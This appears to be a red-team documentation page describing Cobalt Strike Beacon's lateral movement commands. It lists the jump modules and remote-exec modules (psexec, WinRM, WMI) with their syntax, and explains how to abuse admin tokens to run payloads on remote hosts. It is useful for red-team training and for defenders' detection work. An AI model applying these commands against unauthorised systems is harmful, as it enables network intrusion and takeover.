Cobalt Strike Lateral Movement Modules

Once you have a token for a domain admin or a domain user who is a local admin on a target, you may abuse this trust relationship to get control of the target. Cobalt Strike’s Beacon has several built-in options for lateral movement.

Jump Modules

Type jump to list lateral movement options registered with Cobalt Strike. Run jump [module] [target] [listener] to attempt to run a payload on a remote target.

1) psexec (Use a service to run a Service EXE artifact) (x86 arch)

2) psexec64 (Use a service to run a Service EXE artifact) (x64 arch)

3) psexec_psh (Use a service to run a Powershell one-liner) (x86 arch)

4) winrm (Run a Powershell script via WinRM) (x86 arch)

5) winrm64 (Run a Powershell script via WinRM) (x64 arch)

Remote-exec Modules

Run remote-exec, by itself, to list remote execution modules registered with Cobalt Strike. Use remote-exec [module] [target] [command + args] to attempt to run the specified command on a remote target.

1) psexec (Remote execute via Service Control Manager)

2) winrm (Remote execute via WinRM using powershell)

3) wmi (Remote execute via WMI)

Lateral movement is an area, similar to privilege escalation, where some attacks present a natural set of primitives to spawn a session on a remote target. Some attacks give an executeprimitive only. The split between jump and remote-exec gives you flexibility to decide how to weaponize an execute-only primitive.

Aggressor Script has an API to add new modules to jump and remote-exec.

PreviousLateral Movement with Cobalt Strike GUI NextNetwork and Host Enumeration

Last updated 4 months ago